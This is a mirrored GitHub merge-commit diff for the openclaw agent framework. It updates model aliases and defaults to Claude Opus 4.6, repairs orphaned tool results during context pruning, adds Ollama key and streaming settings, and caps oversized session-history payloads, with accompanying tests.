mirror of
https://github.com/openclaw/openclaw.git
synced 2026-05-08 07:01:24 +00:00
Merge branch 'main' into qianfan
This commit is contained in:
@@ -287,16 +287,18 @@ describe("exec notifyOnExit", () => {
|
||||
expect(result.details.status).toBe("running");
|
||||
const sessionId = (result.details as { sessionId: string }).sessionId;
|
||||
|
||||
const prefix = sessionId.slice(0, 8);
|
||||
let finished = getFinishedSession(sessionId);
|
||||
const deadline = Date.now() + (isWin ? 8000 : 2000);
|
||||
while (!finished && Date.now() < deadline) {
|
||||
let hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
|
||||
const deadline = Date.now() + (isWin ? 12_000 : 5_000);
|
||||
while ((!finished || !hasEvent) && Date.now() < deadline) {
|
||||
await sleep(20);
|
||||
finished = getFinishedSession(sessionId);
|
||||
hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
|
||||
}
|
||||
|
||||
expect(finished).toBeTruthy();
|
||||
const events = peekSystemEvents("agent:main:main");
|
||||
expect(events.some((event) => event.includes(sessionId.slice(0, 8)))).toBe(true);
|
||||
expect(hasEvent).toBe(true);
|
||||
});
|
||||
});
|
||||
|
||||
|
||||
@@ -9,8 +9,10 @@ export type ResolvedCliBackend = {
|
||||
|
||||
const CLAUDE_MODEL_ALIASES: Record<string, string> = {
|
||||
opus: "opus",
|
||||
"opus-4.6": "opus",
|
||||
"opus-4.5": "opus",
|
||||
"opus-4": "opus",
|
||||
"claude-opus-4-6": "opus",
|
||||
"claude-opus-4-5": "opus",
|
||||
"claude-opus-4": "opus",
|
||||
sonnet: "sonnet",
|
||||
|
||||
@@ -106,6 +106,10 @@ describe("pruneHistoryForContextShare", () => {
|
||||
});
|
||||
|
||||
it("returns droppedMessagesList containing dropped messages", () => {
|
||||
// Note: This test uses simple user messages with no tool calls.
|
||||
// When orphaned tool_results exist, droppedMessages may exceed
|
||||
// droppedMessagesList.length since orphans are counted but not
|
||||
// added to the list (they lack context for summarization).
|
||||
const messages: AgentMessage[] = [
|
||||
makeMessage(1, 4000),
|
||||
makeMessage(2, 4000),
|
||||
@@ -121,6 +125,7 @@ describe("pruneHistoryForContextShare", () => {
|
||||
});
|
||||
|
||||
expect(pruned.droppedChunks).toBeGreaterThan(0);
|
||||
// Without orphaned tool_results, counts match exactly
|
||||
expect(pruned.droppedMessagesList.length).toBe(pruned.droppedMessages);
|
||||
|
||||
// All messages accounted for: kept + dropped = original
|
||||
@@ -145,4 +150,144 @@ describe("pruneHistoryForContextShare", () => {
|
||||
expect(pruned.droppedMessagesList).toEqual([]);
|
||||
expect(pruned.messages.length).toBe(1);
|
||||
});
|
||||
|
||||
it("removes orphaned tool_result messages when tool_use is dropped", () => {
|
||||
// Scenario: assistant with tool_use is in chunk 1 (dropped),
|
||||
// tool_result is in chunk 2 (kept) - orphaned tool_result should be removed
|
||||
// to prevent "unexpected tool_use_id" errors from Anthropic's API
|
||||
const messages: AgentMessage[] = [
|
||||
// Chunk 1 (will be dropped) - contains tool_use
|
||||
{
|
||||
role: "assistant",
|
||||
content: [
|
||||
{ type: "text", text: "x".repeat(4000) },
|
||||
{ type: "toolUse", id: "call_123", name: "test_tool", input: {} },
|
||||
],
|
||||
timestamp: 1,
|
||||
},
|
||||
// Chunk 2 (will be kept) - contains orphaned tool_result
|
||||
{
|
||||
role: "toolResult",
|
||||
toolCallId: "call_123",
|
||||
toolName: "test_tool",
|
||||
content: [{ type: "text", text: "result".repeat(500) }],
|
||||
timestamp: 2,
|
||||
} as AgentMessage,
|
||||
{
|
||||
role: "user",
|
||||
content: "x".repeat(500),
|
||||
timestamp: 3,
|
||||
},
|
||||
];
|
||||
|
||||
const pruned = pruneHistoryForContextShare({
|
||||
messages,
|
||||
maxContextTokens: 2000,
|
||||
maxHistoryShare: 0.5,
|
||||
parts: 2,
|
||||
});
|
||||
|
||||
// The orphaned tool_result should NOT be in kept messages
|
||||
// (this is the critical invariant that prevents API errors)
|
||||
const keptRoles = pruned.messages.map((m) => m.role);
|
||||
expect(keptRoles).not.toContain("toolResult");
|
||||
|
||||
// The orphan count should be reflected in droppedMessages
|
||||
// (orphaned tool_results are dropped but not added to droppedMessagesList
|
||||
// since they lack context for summarization)
|
||||
expect(pruned.droppedMessages).toBeGreaterThan(pruned.droppedMessagesList.length);
|
||||
});
|
||||
|
||||
it("keeps tool_result when its tool_use is also kept", () => {
|
||||
// Scenario: both tool_use and tool_result are in the kept portion
|
||||
const messages: AgentMessage[] = [
|
||||
// Chunk 1 (will be dropped) - just user content
|
||||
{
|
||||
role: "user",
|
||||
content: "x".repeat(4000),
|
||||
timestamp: 1,
|
||||
},
|
||||
// Chunk 2 (will be kept) - contains both tool_use and tool_result
|
||||
{
|
||||
role: "assistant",
|
||||
content: [
|
||||
{ type: "text", text: "y".repeat(500) },
|
||||
{ type: "toolUse", id: "call_456", name: "kept_tool", input: {} },
|
||||
],
|
||||
timestamp: 2,
|
||||
},
|
||||
{
|
||||
role: "toolResult",
|
||||
toolCallId: "call_456",
|
||||
toolName: "kept_tool",
|
||||
content: [{ type: "text", text: "result" }],
|
||||
timestamp: 3,
|
||||
} as AgentMessage,
|
||||
];
|
||||
|
||||
const pruned = pruneHistoryForContextShare({
|
||||
messages,
|
||||
maxContextTokens: 2000,
|
||||
maxHistoryShare: 0.5,
|
||||
parts: 2,
|
||||
});
|
||||
|
||||
// Both assistant and toolResult should be in kept messages
|
||||
const keptRoles = pruned.messages.map((m) => m.role);
|
||||
expect(keptRoles).toContain("assistant");
|
||||
expect(keptRoles).toContain("toolResult");
|
||||
});
|
||||
|
||||
it("removes multiple orphaned tool_results from the same dropped tool_use", () => {
|
||||
// Scenario: assistant with multiple tool_use blocks is dropped,
|
||||
// all corresponding tool_results should be removed from kept messages
|
||||
const messages: AgentMessage[] = [
|
||||
// Chunk 1 (will be dropped) - contains multiple tool_use blocks
|
||||
{
|
||||
role: "assistant",
|
||||
content: [
|
||||
{ type: "text", text: "x".repeat(4000) },
|
||||
{ type: "toolUse", id: "call_a", name: "tool_a", input: {} },
|
||||
{ type: "toolUse", id: "call_b", name: "tool_b", input: {} },
|
||||
],
|
||||
timestamp: 1,
|
||||
},
|
||||
// Chunk 2 (will be kept) - contains orphaned tool_results
|
||||
{
|
||||
role: "toolResult",
|
||||
toolCallId: "call_a",
|
||||
toolName: "tool_a",
|
||||
content: [{ type: "text", text: "result_a" }],
|
||||
timestamp: 2,
|
||||
} as AgentMessage,
|
||||
{
|
||||
role: "toolResult",
|
||||
toolCallId: "call_b",
|
||||
toolName: "tool_b",
|
||||
content: [{ type: "text", text: "result_b" }],
|
||||
timestamp: 3,
|
||||
} as AgentMessage,
|
||||
{
|
||||
role: "user",
|
||||
content: "x".repeat(500),
|
||||
timestamp: 4,
|
||||
},
|
||||
];
|
||||
|
||||
const pruned = pruneHistoryForContextShare({
|
||||
messages,
|
||||
maxContextTokens: 2000,
|
||||
maxHistoryShare: 0.5,
|
||||
parts: 2,
|
||||
});
|
||||
|
||||
// No orphaned tool_results should be in kept messages
|
||||
const keptToolResults = pruned.messages.filter((m) => m.role === "toolResult");
|
||||
expect(keptToolResults).toHaveLength(0);
|
||||
|
||||
// The orphan count should reflect both dropped tool_results
|
||||
// droppedMessages = 1 (assistant) + 2 (orphaned tool_results) = 3
|
||||
// droppedMessagesList only has the assistant message
|
||||
expect(pruned.droppedMessages).toBe(pruned.droppedMessagesList.length + 2);
|
||||
});
|
||||
});
|
||||
|
||||
@@ -2,6 +2,7 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core";
|
||||
import type { ExtensionContext } from "@mariozechner/pi-coding-agent";
|
||||
import { estimateTokens, generateSummary } from "@mariozechner/pi-coding-agent";
|
||||
import { DEFAULT_CONTEXT_TOKENS } from "./defaults.js";
|
||||
import { repairToolUseResultPairing } from "./session-transcript-repair.js";
|
||||
|
||||
export const BASE_CHUNK_RATIO = 0.4;
|
||||
export const MIN_CHUNK_RATIO = 0.15;
|
||||
@@ -333,11 +334,27 @@ export function pruneHistoryForContextShare(params: {
|
||||
break;
|
||||
}
|
||||
const [dropped, ...rest] = chunks;
|
||||
const flatRest = rest.flat();
|
||||
|
||||
// After dropping a chunk, repair tool_use/tool_result pairing to handle
|
||||
// orphaned tool_results (whose tool_use was in the dropped chunk).
|
||||
// repairToolUseResultPairing drops orphaned tool_results, preventing
|
||||
// "unexpected tool_use_id" errors from Anthropic's API.
|
||||
const repairReport = repairToolUseResultPairing(flatRest);
|
||||
const repairedKept = repairReport.messages;
|
||||
|
||||
// Track orphaned tool_results as dropped (they were in kept but their tool_use was dropped)
|
||||
const orphanedCount = repairReport.droppedOrphanCount;
|
||||
|
||||
droppedChunks += 1;
|
||||
droppedMessages += dropped.length;
|
||||
droppedMessages += dropped.length + orphanedCount;
|
||||
droppedTokens += estimateMessagesTokens(dropped);
|
||||
// Note: We don't have the actual orphaned messages to add to droppedMessagesList
|
||||
// since repairToolUseResultPairing doesn't return them. This is acceptable since
|
||||
// the dropped messages are used for summarization, and orphaned tool_results
|
||||
// without their tool_use context aren't useful for summarization anyway.
|
||||
allDroppedMessages.push(...dropped);
|
||||
keptMessages = rest.flat();
|
||||
keptMessages = repairedKept;
|
||||
}
|
||||
|
||||
return {
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
// Defaults for agent metadata when upstream does not supply them.
|
||||
// Model id uses pi-ai's built-in Anthropic catalog.
|
||||
export const DEFAULT_PROVIDER = "anthropic";
|
||||
export const DEFAULT_MODEL = "claude-opus-4-5";
|
||||
// Context window: Opus 4.5 supports ~200k tokens (per pi-ai models.generated.ts).
|
||||
export const DEFAULT_MODEL = "claude-opus-4-6";
|
||||
// Conservative fallback used when model metadata is unavailable.
|
||||
export const DEFAULT_CONTEXT_TOKENS = 200_000;
|
||||
|
||||
@@ -3,11 +3,17 @@ export type ModelRef = {
|
||||
id?: string | null;
|
||||
};
|
||||
|
||||
const ANTHROPIC_PREFIXES = ["claude-opus-4-5", "claude-sonnet-4-5", "claude-haiku-4-5"];
|
||||
const ANTHROPIC_PREFIXES = [
|
||||
"claude-opus-4-6",
|
||||
"claude-opus-4-5",
|
||||
"claude-sonnet-4-5",
|
||||
"claude-haiku-4-5",
|
||||
];
|
||||
const OPENAI_MODELS = ["gpt-5.2", "gpt-5.0"];
|
||||
const CODEX_MODELS = [
|
||||
"gpt-5.2",
|
||||
"gpt-5.2-codex",
|
||||
"gpt-5.3-codex",
|
||||
"gpt-5.1-codex",
|
||||
"gpt-5.1-codex-mini",
|
||||
"gpt-5.1-codex-max",
|
||||
|
||||
@@ -140,7 +140,7 @@ describe("getApiKeyForModel", () => {
|
||||
} catch (err) {
|
||||
error = err;
|
||||
}
|
||||
expect(String(error)).toContain("openai-codex/gpt-5.2");
|
||||
expect(String(error)).toContain("openai-codex/gpt-5.3-codex");
|
||||
} finally {
|
||||
if (previousOpenAiKey === undefined) {
|
||||
delete process.env.OPENAI_API_KEY;
|
||||
|
||||
@@ -213,7 +213,7 @@ export async function resolveApiKeyForProvider(params: {
|
||||
const hasCodex = listProfilesForProvider(store, "openai-codex").length > 0;
|
||||
if (hasCodex) {
|
||||
throw new Error(
|
||||
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.2 (ChatGPT OAuth) or set OPENAI_API_KEY for openai/gpt-5.2.',
|
||||
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.3-codex (OAuth) or set OPENAI_API_KEY to use openai/gpt-5.1-codex.',
|
||||
);
|
||||
}
|
||||
}
|
||||
@@ -302,6 +302,7 @@ export function resolveEnvApiKey(provider: string): EnvApiKeyResult | null {
|
||||
mistral: "MISTRAL_API_KEY",
|
||||
opencode: "OPENCODE_API_KEY",
|
||||
qianfan: "QIANFAN_API_KEY",
|
||||
ollama: "OLLAMA_API_KEY",
|
||||
};
|
||||
const envVar = envMap[normalized];
|
||||
if (!envVar) {
|
||||
|
||||
@@ -13,9 +13,9 @@ import {
|
||||
isTimeoutError,
|
||||
} from "./failover-error.js";
|
||||
import {
|
||||
buildConfiguredAllowlistKeys,
|
||||
buildModelAliasIndex,
|
||||
modelKey,
|
||||
parseModelRef,
|
||||
resolveConfiguredModelRef,
|
||||
resolveModelRefFromString,
|
||||
} from "./model-selection.js";
|
||||
@@ -51,28 +51,6 @@ function shouldRethrowAbort(err: unknown): boolean {
|
||||
return isAbortError(err) && !isTimeoutError(err);
|
||||
}
|
||||
|
||||
function buildAllowedModelKeys(
|
||||
cfg: OpenClawConfig | undefined,
|
||||
defaultProvider: string,
|
||||
): Set<string> | null {
|
||||
const rawAllowlist = (() => {
|
||||
const modelMap = cfg?.agents?.defaults?.models ?? {};
|
||||
return Object.keys(modelMap);
|
||||
})();
|
||||
if (rawAllowlist.length === 0) {
|
||||
return null;
|
||||
}
|
||||
const keys = new Set<string>();
|
||||
for (const raw of rawAllowlist) {
|
||||
const parsed = parseModelRef(String(raw ?? ""), defaultProvider);
|
||||
if (!parsed) {
|
||||
continue;
|
||||
}
|
||||
keys.add(modelKey(parsed.provider, parsed.model));
|
||||
}
|
||||
return keys.size > 0 ? keys : null;
|
||||
}
|
||||
|
||||
function resolveImageFallbackCandidates(params: {
|
||||
cfg: OpenClawConfig | undefined;
|
||||
defaultProvider: string;
|
||||
@@ -82,7 +60,10 @@ function resolveImageFallbackCandidates(params: {
|
||||
cfg: params.cfg ?? {},
|
||||
defaultProvider: params.defaultProvider,
|
||||
});
|
||||
const allowlist = buildAllowedModelKeys(params.cfg, params.defaultProvider);
|
||||
const allowlist = buildConfiguredAllowlistKeys({
|
||||
cfg: params.cfg,
|
||||
defaultProvider: params.defaultProvider,
|
||||
});
|
||||
const seen = new Set<string>();
|
||||
const candidates: ModelCandidate[] = [];
|
||||
|
||||
@@ -166,7 +147,10 @@ function resolveFallbackCandidates(params: {
|
||||
cfg: params.cfg ?? {},
|
||||
defaultProvider,
|
||||
});
|
||||
const allowlist = buildAllowedModelKeys(params.cfg, defaultProvider);
|
||||
const allowlist = buildConfiguredAllowlistKeys({
|
||||
cfg: params.cfg,
|
||||
defaultProvider,
|
||||
});
|
||||
const seen = new Set<string>();
|
||||
const candidates: ModelCandidate[] = [];
|
||||
|
||||
|
||||
@@ -29,6 +29,17 @@ describe("model-selection", () => {
|
||||
});
|
||||
});
|
||||
|
||||
it("normalizes anthropic alias refs to canonical model ids", () => {
|
||||
expect(parseModelRef("anthropic/opus-4.6", "openai")).toEqual({
|
||||
provider: "anthropic",
|
||||
model: "claude-opus-4-6",
|
||||
});
|
||||
expect(parseModelRef("opus-4.6", "anthropic")).toEqual({
|
||||
provider: "anthropic",
|
||||
model: "claude-opus-4-6",
|
||||
});
|
||||
});
|
||||
|
||||
it("should use default provider if none specified", () => {
|
||||
expect(parseModelRef("claude-3-5-sonnet", "anthropic")).toEqual({
|
||||
provider: "anthropic",
|
||||
|
||||
@@ -16,6 +16,12 @@ export type ModelAliasIndex = {
|
||||
byKey: Map<string, string[]>;
|
||||
};
|
||||
|
||||
const ANTHROPIC_MODEL_ALIASES: Record<string, string> = {
|
||||
"opus-4.6": "claude-opus-4-6",
|
||||
"opus-4.5": "claude-opus-4-5",
|
||||
"sonnet-4.5": "claude-sonnet-4-5",
|
||||
};
|
||||
|
||||
function normalizeAliasKey(value: string): string {
|
||||
return value.trim().toLowerCase();
|
||||
}
|
||||
@@ -59,13 +65,7 @@ function normalizeAnthropicModelId(model: string): string {
|
||||
return trimmed;
|
||||
}
|
||||
const lower = trimmed.toLowerCase();
|
||||
if (lower === "opus-4.5") {
|
||||
return "claude-opus-4-5";
|
||||
}
|
||||
if (lower === "sonnet-4.5") {
|
||||
return "claude-sonnet-4-5";
|
||||
}
|
||||
return trimmed;
|
||||
return ANTHROPIC_MODEL_ALIASES[lower] ?? trimmed;
|
||||
}
|
||||
|
||||
function normalizeProviderModelId(provider: string, model: string): string {
|
||||
@@ -99,6 +99,33 @@ export function parseModelRef(raw: string, defaultProvider: string): ModelRef |
|
||||
return { provider, model: normalizedModel };
|
||||
}
|
||||
|
||||
export function resolveAllowlistModelKey(raw: string, defaultProvider: string): string | null {
|
||||
const parsed = parseModelRef(raw, defaultProvider);
|
||||
if (!parsed) {
|
||||
return null;
|
||||
}
|
||||
return modelKey(parsed.provider, parsed.model);
|
||||
}
|
||||
|
||||
export function buildConfiguredAllowlistKeys(params: {
|
||||
cfg: OpenClawConfig | undefined;
|
||||
defaultProvider: string;
|
||||
}): Set<string> | null {
|
||||
const rawAllowlist = Object.keys(params.cfg?.agents?.defaults?.models ?? {});
|
||||
if (rawAllowlist.length === 0) {
|
||||
return null;
|
||||
}
|
||||
|
||||
const keys = new Set<string>();
|
||||
for (const raw of rawAllowlist) {
|
||||
const key = resolveAllowlistModelKey(String(raw ?? ""), params.defaultProvider);
|
||||
if (key) {
|
||||
keys.add(key);
|
||||
}
|
||||
}
|
||||
return keys.size > 0 ? keys : null;
|
||||
}
|
||||
|
||||
export function buildModelAliasIndex(params: {
|
||||
cfg: OpenClawConfig;
|
||||
defaultProvider: string;
|
||||
|
||||
@@ -12,4 +12,45 @@ describe("Ollama provider", () => {
|
||||
// Ollama requires explicit configuration via OLLAMA_API_KEY env var or profile
|
||||
expect(providers?.ollama).toBeUndefined();
|
||||
});
|
||||
|
||||
it("should disable streaming by default for Ollama models", async () => {
|
||||
const agentDir = mkdtempSync(join(tmpdir(), "openclaw-test-"));
|
||||
process.env.OLLAMA_API_KEY = "test-key";
|
||||
|
||||
try {
|
||||
const providers = await resolveImplicitProviders({ agentDir });
|
||||
|
||||
// Provider should be defined with OLLAMA_API_KEY set
|
||||
expect(providers?.ollama).toBeDefined();
|
||||
expect(providers?.ollama?.apiKey).toBe("OLLAMA_API_KEY");
|
||||
|
||||
// Note: discoverOllamaModels() returns empty array in test environments (VITEST env var check)
|
||||
// so we can't test the actual model discovery here. The streaming: false setting
|
||||
// is applied in the model mapping within discoverOllamaModels().
|
||||
// The configuration structure itself is validated by TypeScript and the Zod schema.
|
||||
} finally {
|
||||
delete process.env.OLLAMA_API_KEY;
|
||||
}
|
||||
});
|
||||
|
||||
it("should have correct model structure with streaming disabled (unit test)", () => {
|
||||
// This test directly verifies the model configuration structure
|
||||
// since discoverOllamaModels() returns empty array in test mode
|
||||
const mockOllamaModel = {
|
||||
id: "llama3.3:latest",
|
||||
name: "llama3.3:latest",
|
||||
reasoning: false,
|
||||
input: ["text"],
|
||||
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
|
||||
contextWindow: 128000,
|
||||
maxTokens: 8192,
|
||||
params: {
|
||||
streaming: false,
|
||||
},
|
||||
};
|
||||
|
||||
// Verify the model structure matches what discoverOllamaModels() would return
|
||||
expect(mockOllamaModel.params?.streaming).toBe(false);
|
||||
expect(mockOllamaModel.params).toHaveProperty("streaming");
|
||||
});
|
||||
});
|
||||
|
||||
@@ -136,6 +136,11 @@ async function discoverOllamaModels(): Promise<ModelDefinitionConfig[]> {
|
||||
cost: OLLAMA_DEFAULT_COST,
|
||||
contextWindow: OLLAMA_DEFAULT_CONTEXT_WINDOW,
|
||||
maxTokens: OLLAMA_DEFAULT_MAX_TOKENS,
|
||||
// Disable streaming by default for Ollama to avoid SDK issue #1205
|
||||
// See: https://github.com/badlogic/pi-mono/issues/1205
|
||||
params: {
|
||||
streaming: false,
|
||||
},
|
||||
};
|
||||
});
|
||||
} catch (error) {
|
||||
|
||||
@@ -181,6 +181,128 @@ describe("sessions tools", () => {
|
||||
expect(withToolsDetails.messages).toHaveLength(2);
|
||||
});
|
||||
|
||||
it("sessions_history caps oversized payloads and strips heavy fields", async () => {
|
||||
callGatewayMock.mockReset();
|
||||
const oversized = Array.from({ length: 80 }, (_, idx) => ({
|
||||
role: "assistant",
|
||||
content: [
|
||||
{
|
||||
type: "text",
|
||||
text: `${String(idx)}:${"x".repeat(5000)}`,
|
||||
},
|
||||
{
|
||||
type: "thinking",
|
||||
thinking: "y".repeat(7000),
|
||||
thinkingSignature: "sig".repeat(4000),
|
||||
},
|
||||
],
|
||||
details: {
|
||||
giant: "z".repeat(12000),
|
||||
},
|
||||
usage: {
|
||||
input: 1,
|
||||
output: 1,
|
||||
},
|
||||
}));
|
||||
callGatewayMock.mockImplementation(async (opts: unknown) => {
|
||||
const request = opts as { method?: string };
|
||||
if (request.method === "chat.history") {
|
||||
return { messages: oversized };
|
||||
}
|
||||
return {};
|
||||
});
|
||||
|
||||
const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
|
||||
expect(tool).toBeDefined();
|
||||
if (!tool) {
|
||||
throw new Error("missing sessions_history tool");
|
||||
}
|
||||
|
||||
const result = await tool.execute("call4b", {
|
||||
sessionKey: "main",
|
||||
includeTools: true,
|
||||
});
|
||||
const details = result.details as {
|
||||
messages?: Array<Record<string, unknown>>;
|
||||
truncated?: boolean;
|
||||
droppedMessages?: boolean;
|
||||
contentTruncated?: boolean;
|
||||
bytes?: number;
|
||||
};
|
||||
expect(details.truncated).toBe(true);
|
||||
expect(details.droppedMessages).toBe(true);
|
||||
expect(details.contentTruncated).toBe(true);
|
||||
expect(typeof details.bytes).toBe("number");
|
||||
expect((details.bytes ?? 0) <= 80 * 1024).toBe(true);
|
||||
expect(details.messages && details.messages.length > 0).toBe(true);
|
||||
|
||||
const first = details.messages?.[0] as
|
||||
| {
|
||||
details?: unknown;
|
||||
usage?: unknown;
|
||||
content?: Array<{
|
||||
type?: string;
|
||||
text?: string;
|
||||
thinking?: string;
|
||||
thinkingSignature?: string;
|
||||
}>;
|
||||
}
|
||||
| undefined;
|
||||
expect(first?.details).toBeUndefined();
|
||||
expect(first?.usage).toBeUndefined();
|
||||
const textBlock = first?.content?.find((block) => block.type === "text");
|
||||
expect(typeof textBlock?.text).toBe("string");
|
||||
expect((textBlock?.text ?? "").length <= 4015).toBe(true);
|
||||
const thinkingBlock = first?.content?.find((block) => block.type === "thinking");
|
||||
expect(thinkingBlock?.thinkingSignature).toBeUndefined();
|
||||
});
|
||||
|
||||
it("sessions_history enforces a hard byte cap even when a single message is huge", async () => {
|
||||
callGatewayMock.mockReset();
|
||||
callGatewayMock.mockImplementation(async (opts: unknown) => {
|
||||
const request = opts as { method?: string };
|
||||
if (request.method === "chat.history") {
|
||||
return {
|
||||
messages: [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "text", text: "ok" }],
|
||||
extra: "x".repeat(200_000),
|
||||
},
|
||||
],
|
||||
};
|
||||
}
|
||||
return {};
|
||||
});
|
||||
|
||||
const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
|
||||
expect(tool).toBeDefined();
|
||||
if (!tool) {
|
||||
throw new Error("missing sessions_history tool");
|
||||
}
|
||||
|
||||
const result = await tool.execute("call4c", {
|
||||
sessionKey: "main",
|
||||
includeTools: true,
|
||||
});
|
||||
const details = result.details as {
|
||||
messages?: Array<Record<string, unknown>>;
|
||||
truncated?: boolean;
|
||||
droppedMessages?: boolean;
|
||||
contentTruncated?: boolean;
|
||||
bytes?: number;
|
||||
};
|
||||
expect(details.truncated).toBe(true);
|
||||
expect(details.droppedMessages).toBe(true);
|
||||
expect(details.contentTruncated).toBe(false);
|
||||
expect(typeof details.bytes).toBe("number");
|
||||
expect((details.bytes ?? 0) <= 80 * 1024).toBe(true);
|
||||
expect(details.messages).toHaveLength(1);
|
||||
expect(details.messages?.[0]?.content).toContain(
|
||||
"[sessions_history omitted: message too large]",
|
||||
);
|
||||
});
|
||||
|
||||
it("sessions_history resolves sessionId inputs", async () => {
|
||||
callGatewayMock.mockReset();
|
||||
const sessionId = "sess-group";
|
||||
|
||||
@@ -8,12 +8,12 @@ import {
|
||||
|
||||
describe("resolveOpencodeZenAlias", () => {
|
||||
it("resolves opus alias", () => {
|
||||
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-6");
|
||||
});
|
||||
|
||||
it("keeps legacy aliases working", () => {
|
||||
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-6");
|
||||
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-6");
|
||||
expect(resolveOpencodeZenAlias("gpt4")).toBe("gpt-5.1");
|
||||
expect(resolveOpencodeZenAlias("o1")).toBe("gpt-5.2");
|
||||
expect(resolveOpencodeZenAlias("gemini-2.5")).toBe("gemini-3-pro");
|
||||
@@ -32,14 +32,14 @@ describe("resolveOpencodeZenAlias", () => {
|
||||
});
|
||||
|
||||
it("is case-insensitive", () => {
|
||||
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-6");
|
||||
expect(resolveOpencodeZenAlias("Gpt5")).toBe("gpt-5.2");
|
||||
});
|
||||
});
|
||||
|
||||
describe("resolveOpencodeZenModelApi", () => {
|
||||
it("maps APIs by model family", () => {
|
||||
expect(resolveOpencodeZenModelApi("claude-opus-4-5")).toBe("anthropic-messages");
|
||||
expect(resolveOpencodeZenModelApi("claude-opus-4-6")).toBe("anthropic-messages");
|
||||
expect(resolveOpencodeZenModelApi("gemini-3-pro")).toBe("google-generative-ai");
|
||||
expect(resolveOpencodeZenModelApi("gpt-5.2")).toBe("openai-responses");
|
||||
expect(resolveOpencodeZenModelApi("alpha-gd4")).toBe("openai-completions");
|
||||
@@ -53,13 +53,14 @@ describe("getOpencodeZenStaticFallbackModels", () => {
|
||||
it("returns an array of models", () => {
|
||||
const models = getOpencodeZenStaticFallbackModels();
|
||||
expect(Array.isArray(models)).toBe(true);
|
||||
expect(models.length).toBe(9);
|
||||
expect(models.length).toBe(10);
|
||||
});
|
||||
|
||||
it("includes Claude, GPT, Gemini, and GLM models", () => {
|
||||
const models = getOpencodeZenStaticFallbackModels();
|
||||
const ids = models.map((m) => m.id);
|
||||
|
||||
expect(ids).toContain("claude-opus-4-6");
|
||||
expect(ids).toContain("claude-opus-4-5");
|
||||
expect(ids).toContain("gpt-5.2");
|
||||
expect(ids).toContain("gpt-5.1-codex");
|
||||
@@ -83,15 +84,16 @@ describe("getOpencodeZenStaticFallbackModels", () => {
|
||||
|
||||
describe("OPENCODE_ZEN_MODEL_ALIASES", () => {
|
||||
it("has expected aliases", () => {
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-5");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-6");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.codex).toBe("gpt-5.1-codex");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt5).toBe("gpt-5.2");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.gemini).toBe("gemini-3-pro");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.glm).toBe("glm-4.7");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES["opus-4.5"]).toBe("claude-opus-4-5");
|
||||
|
||||
// Legacy aliases (kept for backward compatibility).
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-5");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-5");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-6");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-6");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt4).toBe("gpt-5.1");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.o1).toBe("gpt-5.2");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES["gemini-2.5"]).toBe("gemini-3-pro");
|
||||
|
||||
@@ -1,8 +1,11 @@
|
||||
/**
|
||||
* OpenCode Zen model catalog with dynamic fetching, caching, and static fallback.
|
||||
*
|
||||
* OpenCode Zen is a $200/month subscription that provides proxy access to multiple
|
||||
* AI models (Claude, GPT, Gemini, etc.) through a single API endpoint.
|
||||
* OpenCode Zen is a pay-as-you-go token-based API that provides access to curated
|
||||
* models optimized for coding agents. It uses per-request billing with auto top-up.
|
||||
*
|
||||
* Note: OpenCode Black ($20/$100/$200/month subscriptions) is a separate product
|
||||
* with flat-rate usage tiers. This module handles Zen, not Black.
|
||||
*
|
||||
* API endpoint: https://opencode.ai/zen/v1
|
||||
* Auth URL: https://opencode.ai/auth
|
||||
@@ -11,7 +14,7 @@
|
||||
import type { ModelApi, ModelDefinitionConfig } from "../config/types.js";
|
||||
|
||||
export const OPENCODE_ZEN_API_BASE_URL = "https://opencode.ai/zen/v1";
|
||||
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-5";
|
||||
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-6";
|
||||
export const OPENCODE_ZEN_DEFAULT_MODEL_REF = `opencode/${OPENCODE_ZEN_DEFAULT_MODEL}`;
|
||||
|
||||
// Cache for fetched models (1 hour TTL)
|
||||
@@ -21,19 +24,20 @@ const CACHE_TTL_MS = 60 * 60 * 1000; // 1 hour
|
||||
|
||||
/**
|
||||
* Model aliases for convenient shortcuts.
|
||||
* Users can use "opus" instead of "claude-opus-4-5", etc.
|
||||
* Users can use "opus" instead of "claude-opus-4-6", etc.
|
||||
*/
|
||||
export const OPENCODE_ZEN_MODEL_ALIASES: Record<string, string> = {
|
||||
// Claude
|
||||
opus: "claude-opus-4-5",
|
||||
opus: "claude-opus-4-6",
